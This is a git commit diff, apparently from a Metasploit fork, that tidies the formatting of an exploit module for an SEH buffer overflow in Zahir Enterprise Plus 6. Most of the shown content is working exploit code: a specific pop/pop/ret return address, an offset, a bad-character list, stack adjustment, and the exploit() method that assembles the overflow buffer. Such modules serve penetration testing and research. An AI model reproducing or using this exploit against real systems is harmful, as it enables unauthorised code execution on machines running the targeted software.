Fixing for msftidy

Fixing some format because still throw errors
GSoC/Meterpreter_Web_Console
Thomas Gregory 2018-10-03 18:55:29 +07:00
parent cb5d68b641
commit 991ac3c671
1 changed files with 7 additions and 4 deletions

View File

@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'f3ci', # found the vulnerability 'f3ci', # found the vulnerability
'modpr0be' # Metasploit Module 'modpr0be' # Metasploit Module
], ],
'References' => 'References' =>
@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
[ [
'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal', 'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal',
{ {
'Ret' => 0x52016661, # P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl) #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
'Ret' => 0x52016661,
'Offset' => 3041 'Offset' => 3041
} }
] ]
@ -42,7 +43,9 @@ class MetasploitModule < Msf::Exploit::Remote
'Payload' => 'Payload' =>
{ {
'Space' => 5000, 'Space' => 5000,
'BadChars' => "\x00\x0a\x0d\x22\x2c" 'BadChars' => "\x00\x0a\x0d\x22\x2c",
'DisableNops' => true,
'StackAdjustment' => -3500
}, },
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => 'Sep 28 2018', 'DisclosureDate' => 'Sep 28 2018',
@ -57,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit def exploit
buf = rand_text_alpha_upper(target['Offset']) buf = rand_text_alpha_upper(target['Offset'])
buf << "\n\r" # crash chars buf << "\r\n" # crash chars
buf << rand_text_alpha_upper(380) # extra chars to hit the offset buf << rand_text_alpha_upper(380) # extra chars to hit the offset
buf << generate_seh_record(target.ret) buf << generate_seh_record(target.ret)
buf << make_nops(12) buf << make_nops(12)